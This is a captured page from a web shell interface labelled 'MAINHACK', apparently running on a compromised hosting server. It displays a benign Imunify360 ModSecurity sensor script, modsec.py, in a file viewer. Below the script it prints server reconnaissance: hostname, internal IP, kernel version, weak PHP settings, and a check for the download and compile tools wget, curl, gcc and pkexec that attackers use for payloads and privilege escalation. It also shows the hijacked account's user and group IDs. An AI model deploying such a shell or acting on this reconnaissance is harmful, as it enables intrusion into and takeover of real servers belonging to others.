[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: modsec.py
File is not writable. Editing disabled.
#!/opt/imunify360/venv/bin/python3 import time from collections import deque from logging import getLogger from defence360agent.contracts.messages import MessageType from defence360agent.contracts.plugins import LogStreamReader from defence360agent.subsys.panels.base import PanelException from defence360agent.utils import RecurringCheckStop, recurring_check from defence360agent.utils.common import MINUTE, rate_limit from im360.subsys import modsec_audit_log from im360.subsys.panels.hosting_panel import HostingPanel PLUGIN_ID = "modsec" logger = getLogger(__name__) throttled_log_exception = rate_limit(period=5 * MINUTE)(logger.warning) class ModsecSensor(LogStreamReader): error_buffer = deque(maxlen=100) context_buffer = deque(maxlen=10) async def create_sensor(self, loop, sink): self.source_file, audit_logdir = self._get_log_paths() if self.source_file is None: self._parser = None elif audit_logdir is None: self._parser = modsec_audit_log.SerialLogParser() else: self._parser = modsec_audit_log.RevolverParser( audit_logdir_path=audit_logdir ) await super().create_sensor(loop, sink) def _get_log_paths(self): hp = HostingPanel() result = [] for method in hp.get_audit_log_path, hp.get_audit_logdir_path: try: result.append(method()) except PanelException as e: logger.warning("%s failed: %s", method, e) result.append(None) return tuple(result) @recurring_check(0) async def _infinite_read_and_proceed(self, stream_reader): try: bytes_ = await stream_reader.readline() # If limit was reached but no full line was consumed except ValueError as e: logger.warning(e) return if not bytes_: # eof if self.error_buffer: throttled_log_exception(self.formatted_error_buffer()) self.error_buffer.clear() self.context_buffer.clear() raise RecurringCheckStop() self.context_buffer.append(bytes_) try: tokens = self._parser.feed(bytes_) except ( modsec_audit_log.ParseError, modsec_audit_log.MalformedFileError, ) as e: self.error_buffer.append((b"".join(self.context_buffer), e)) return else: if self.error_buffer: # there were errors previously throttled_log_exception(self.formatted_error_buffer()) self.error_buffer.clear() if not tokens: return ts = time.time() for incident in tokens: incident["timestamp"] = ts incident["domain"] = dict( incident.get("advanced", {}).get("headers", []) ).get("Host") await self._sink.process_message( MessageType.SensorIncident(incident) ) def formatted_error_buffer(self): errors = [ f"{e} in the context of {context}" for context, e in self.error_buffer ] return "\n".join(errors)
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 690.32 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A